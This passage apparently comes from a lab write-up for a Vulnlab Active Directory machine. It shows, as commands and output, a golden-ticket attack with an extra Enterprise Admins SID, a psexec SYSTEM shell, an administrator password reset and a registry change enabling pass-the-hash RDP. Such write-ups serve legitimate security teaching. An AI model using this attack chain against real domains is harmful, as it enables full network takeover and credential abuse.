517: TRUSTED\Cert Publishers (SidTypeAlias)
518: TRUSTED\Schema Admins (SidTypeGroup)
519: TRUSTED\Enterprise Admins (SidTypeGroup)
Now we have:
- The KRBTGT hash for the child domain:
<REDACTED> - The SID for the child domain:
S-1-5-21-2241985869-2159962460-1278545866 - The name of a target user in the child domain (Any domain user):
Administrator - The FQDN of the child domain:
lab.trusted.vl - The SID of the Enterprise Admins group of the root domain:
S-1-5-21-3576695518-347000760-3731839591-519
Let’s construct Golden ticket
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ ticketer.py -nthash <REDACTED> -domain lab.trusted.vl -domain-sid S-1-5-21-2241985869-2159962460-1278545866 -extra-sid S-1-5-21-3576695518-347000760-3731839591-519 Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for lab.trusted.vl/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
And we pwn the root domain
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
└─$ KRB5CCNAME=Administrator.ccache psexec.py lab.trusted.vl/Administrator@trusteddc.trusted.vl -k -no-pass -target-ip 10.10.195.213
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.195.213.....
[*] Found writable share ADMIN$
[*] Uploading file naBXSbgN.exe
[*] Opening SVCManager on 10.10.195.213.....
[*] Creating service pCeY on 10.10.195.213.....
[*] Starting service pCeY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
The attack can also be performed with raiseChild.py
But we can’t access the flag
1
2
C:\Users\Administrator\Desktop> type root.txt
Access is denied.
Let’s dump the hashes and connect as Administrator. We have permissions to read the file
1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\Administrator\desktop> get-acl root.txt |fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\desktop\root.txt
Owner : BUILTIN\Administrators
Group : TRUSTED\Domain Users
Access : NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
TRUSTED\Administrator Allow FullControl
Audit :
Sddl : O:BAG:DUD:(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)
Then someone hinted that file is encrypted
1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\Administrator\desktop> CIPHER /u /n
Encrypted File(s) on your system:
C:\Documents and Settings\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt
In order to read it we have to can use RunasCs, but it will require password change for administrator
1
2
3
*Evil-WinRM* PS C:\Users\Administrator\desktop> net user administrator "P@ssw0rd!"
The command completed successfully.
1
*Evil-WinRM* PS C:\ProgramData> .\runascs.exe administrator P@ssw0rd! "cmd.exe /c type C:\Users\Administrator\desktop\root.txt"
Another way to do it via RDP, but first we have to enable PTH authentication for Administrator accounts, since it is disabled by default
1
2
3
*Evil-WinRM* PS C:\Users\Administrator\desktop> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
The operation completed successfully.
Now we can connect via rdp and get the flag
1
2
└─$ xfreerdp /v:10.10.195.213 /u:Administrator /pth:'<REDACTED>'
https://api.vulnlab.com/api/v1/share?id=ebd21ef5-7230-437a-8093-55558af39522
This post is licensed under CC BY 4.0 by the author.